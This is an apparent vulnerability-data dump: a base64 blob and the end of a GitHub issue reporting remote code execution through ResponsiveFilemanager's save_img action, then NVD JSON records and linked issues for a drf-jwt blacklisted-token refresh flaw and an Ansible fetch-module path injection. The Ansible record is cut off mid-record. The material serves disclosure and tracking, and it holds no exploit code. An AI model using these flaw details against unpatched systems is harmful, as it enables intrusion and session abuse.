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 lcnPQ+tODFRyc+9KQc8UhAxzWkW1sxuKe5//2Q== ``` A CVE has been requested and a potential fast patch is to dissable save_img in the config file.
remote code execution vulnerability in ajax_calls.php in save_img action because of no validation on extension name.
https://api.github.com/repos/trippo/ResponsiveFilemanager/issues/600/comments
14
2020-03-13T20:06:55Z
2024-06-13T22:42:57Z
https://github.com/trippo/ResponsiveFilemanager/issues/600
580,818,981
600
1,111
CVE-2020-10594
2020-03-15T22:15:14.130
An issue was discovered in drf-jwt 1.15.x before 1.15.1. It allows attackers with access to a notionally invalidated token to obtain a new, working token via the refresh endpoint, because the blacklist protection mechanism is incompatible with the token-refresh feature. NOTE: drf-jwt is a fork of jpadilla/django-rest-framework-jwt, which is unmaintained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/drf-jwt/1.15.1/#history" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/drf-jwt/1.15.1/#history" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:styria:django-rest-framework-json_web_tokens:*:*:*:*:*:*:*:*", "matchCriteriaId": "22200040-522F-4DC6-81C5-5AA358FCF8BF", "versionEndExcluding": "1.15.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Styria-Digital", "django-rest-framework-jwt" ]
If you configure an app to allow blacklisting tokens and turn `JWT_ALLOW_REFRESH` on, then you can still operate the refresh endpoint using a blacklisted token, which allows you to side-step the fact that the token is invalidated.
Blacklisted tokens can still be refreshed
https://api.github.com/repos/Styria-Digital/django-rest-framework-jwt/issues/36/comments
3
2020-03-02T20:17:34Z
2020-03-12T09:01:27Z
https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36
574,221,165
36
1,112
CVE-2020-10594
2020-03-15T22:15:14.130
An issue was discovered in drf-jwt 1.15.x before 1.15.1. It allows attackers with access to a notionally invalidated token to obtain a new, working token via the refresh endpoint, because the blacklist protection mechanism is incompatible with the token-refresh feature. NOTE: drf-jwt is a fork of jpadilla/django-rest-framework-jwt, which is unmaintained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/drf-jwt/1.15.1/#history" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://pypi.org/project/drf-jwt/1.15.1/#history" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:styria:django-rest-framework-json_web_tokens:*:*:*:*:*:*:*:*", "matchCriteriaId": "22200040-522F-4DC6-81C5-5AA358FCF8BF", "versionEndExcluding": "1.15.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/jpadilla/django-rest-framework-jwt/issues/484
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jpadilla", "django-rest-framework-jwt" ]
Hello there, For a long time now I've honestly thought I'd have the time and energy to come back and work on this project, and I think I still don't. I've not worked on any project recently needing it, which makes it harder to find time to come back. At some point I also noticed I no longer liked how the project had evolved and that it deserved a fair redesign and there are a few fundamental changes required. Now I'm certain that I wouldn't be able to work on this with the care required for a major version bump. I'm definitely not proud at how long it has taken me to make this or any update, I recognize that and I'm sorry for not having spoken out sooner. There's two efforts/projects that I'd like to point out to: Fork: https://github.com/Styria-Digital/django-rest-framework-jwt Drop-in updated replacement fork. I'm willing to transfer repo, pypi, etc, to keep this going. Alternative: https://github.com/davesque/django-rest-framework-simplejwt Many of the changes that I've wanted to work on are already done here. This is what I would probably use today. Learned quite a few things from this. Thanks to everyone, including past collaborators and contributors. ❤️ Update: I've transferred the repository from @GetBlimp. Neither @GetBlimp nor @gcollazo are involved with this project anymore.
Status
https://api.github.com/repos/jpadilla/django-rest-framework-jwt/issues/484/comments
12
2019-07-08T11:01:47Z
2020-03-19T05:54:09Z
https://github.com/jpadilla/django-rest-framework-jwt/issues/484
465,192,457
484
1,113
CVE-2020-1735
2020-03-16T16:15:13.890
A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 3.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.1, "impactScore": 2.7, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.5, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1735" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67793" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "1AA398A0-5DCC-4202-BB11-B2871FB796B4", "versionEndExcluding": "2.7.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "84818035-3E65-464B-A84A-22DADA640D19", "versionEndExcluding": "2.8.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "matchCriteriaId": "341AEE03-9334-416D-9896-A37697B43CCC", "versionEndExcluding": "2.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "64DD1400-5512-493E-85DB-B3C18FBB2DBB", "versionEndExcluding": null, "versionEndIncluding": "3.4.5", "versionStartExcluding": null, "versionStartIncluding": "3.3.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "F2062F74-68D8-4E75-BC69-6038B519F823", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExcluding": null, "versionStartIncluding": "3.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "342D4A63-0972-413B-BD65-0495DBF1CDFB", "versionEndExcluding": null, "versionEndIncluding": "3.6.3", "versionStartExcluding": null, "versionStartIncluding": "3.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*", "matchCriteriaId": "704CFA1A-953E-4105-BFBE-406034B83DED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, 